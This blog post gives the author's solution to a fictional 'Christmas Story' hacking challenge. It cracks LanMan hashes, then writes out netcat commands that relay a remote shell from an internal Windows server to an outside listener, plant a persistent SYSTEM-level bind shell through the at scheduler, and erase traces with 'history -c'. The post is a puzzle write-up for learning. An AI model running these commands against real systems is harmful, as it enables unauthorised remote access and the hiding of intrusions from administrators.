The Christmas (Hacking) Story challenge is over and unfortunately I didn’t win :), so I publish my response:
What is interesting about the files that Ralphie could see on the lamp server?
nc is most probably netcat (http://netcat.sourceforge.net/), the “network swiss army knife” (the fact that it’s executable, as can be seen from the directory listing, is an other indication that it’s netcat). The empty file is very handy, because (a) it’s empty, so at the end it will be easier to restore it’s contents (see the answer to question 4) and (b) because nc can’t pass parameters to the executable is pipes, so we need a file to store those parameters (see answer 3).
What is the significance of the Annie cyphertext?
They are LanMan hashes, which give a hint to the solution and also contain a subliminal message 😉
62b7cd49704064bdaad3b435b51404ee DRINK 97e61e27b7599adfaad3b435b51404ee MORE 04baf1615a04764eaad3b435b51404ee OVAL c90b9e4f1b743404aad3b435b51404ee TINE 4eaf812dafa29cf7aad3b435b51404ee BUY aab65b7207a5faf9aad3b435b51404ee COUNTER 9d82cdff56b35758aad3b435b51404ee HACK e414a2208c930d79aad3b435b51404ee RELOADE eced132790cb280baad3b435b51404ee USE f6f2790b99137838aad3b435b51404ee NET bbc70d3c8f0049a5aad3b435b51404ee CAT a5cd742a1ff7dd5aaad3b435b51404ee RELAY
They can be cracked either by dictionary attack or using rainbow tables (http://ophcrack.sourceforge.net/). An other interesting method to crack them would be the work of Dan Moniz and Patrick Stach (check out their presentation at http://www.shmoocon.org/2006/presentations.html), however they haven’t released any public material (yet).
What command could Ralphie e-mail to the lamp to get access to the command shell on the furnace server from the kid’s network to read the Christmas list? What should Ralphie do on his own laptop for this to work? Assume that you cannot alter the configuration of the lamp or get any higher privileges on that machine, nor can you reconfigure the firewall.
First he should open up a listener on port 80 or on port 443. He can do this by using netcat (there are versions of netcat for nearly every operating system, so it really doesn’t matter what he’s running on the laptop). The command would be:
nc -l -p 80 (or 443)
If he’s running a unix* variant (linux, bsd, MacOS, etc), he needs root privileges to open up such a low port. We assume he has root privileges on his own laptop, and he would do:
sudo nc -l -p 80
Now he needs create the relay between his computer and the protected windows server. First he should write a little script in the chimney file (using commands sent via e-mail to the lamp server. each line represents a separate command):
echo #!/bin/bash > chimney
echo ./nc 10.10.10.10 2222 >> chimney(instead of this he could use echo telnet 10.10.10.10 2222 >> chimney as telnet is present in 99.9% of the linux distributions, but just to be cautious, we use netcat)
chmod +x chimney
Now we are ready to create the tunnel. Issue the following command through e-mail:
./nc 10.11.11.11 80 -e ./chimney
We should get back on the kids computer a connection to the shell running on the windows server) and we can check out the text files.
How can Ralphie make the activities you describe above less likely to be detected by his Old Man?
After we disconnect from the shell it will die on the windows server (meaning that it won’t be accessible after it) unless it is launched from a batch file like
:start_shell nc -l -p 2222 -e cmd.exe goto start_shell
So the first thing we need to do is to restart the shell. This can be done easily by creating a batch file (c:nc.bat for example), with the following content:
start c:nc.exe -l -p 2222 -e cmd.exe del c:nc.bat
(by doing an echo … >> c:nc.bat from the shell for example) and scheduling it for a moment shortly after we disconnect with the at command (for example if we are ready to disconnect at 13:30, we execute the command at 13:32 “c:nc.bat” and then we disconnect). The start at the first line is necessary so that we don’t wait for netcat to exit before we can delete the batch file. The schedule will be automatically deleted after it’s executed so we don’t have to worry about that. The shell will be executed under the SYSTEM account, so it’s not likely that an access denied error message will appear when the Old Man connects to it and tries to execute commands (which could raise his suspicion). Then again, with advanced system monitoring tools like Process Explorer from SysInternals (now Microsoft) – http://www.microsoft.com/technet/sysinternals/utilities/ProcessExplorer.mspx – one can see two suspicious things:
- the process ID will be different (is one has known the original one)
- the nc process will be without a parent (as the parent dies after starting it). it may be that the original nc had a well defined parent.
Windows has nothing similar to bash history, so we don’t need to worry about it. However we should cover our tracks on the Lamp server by issuing the following command through e-mail:
chmod -x chimney cat /dev/null > chimney history -c
(the last line is useful to clear the history file for the shell which executed the commands, hiding one of the possible sources to discover the offending IP address. However an empty history file in itself is suspicious and also it may be that the emails themselves are logged somewhere)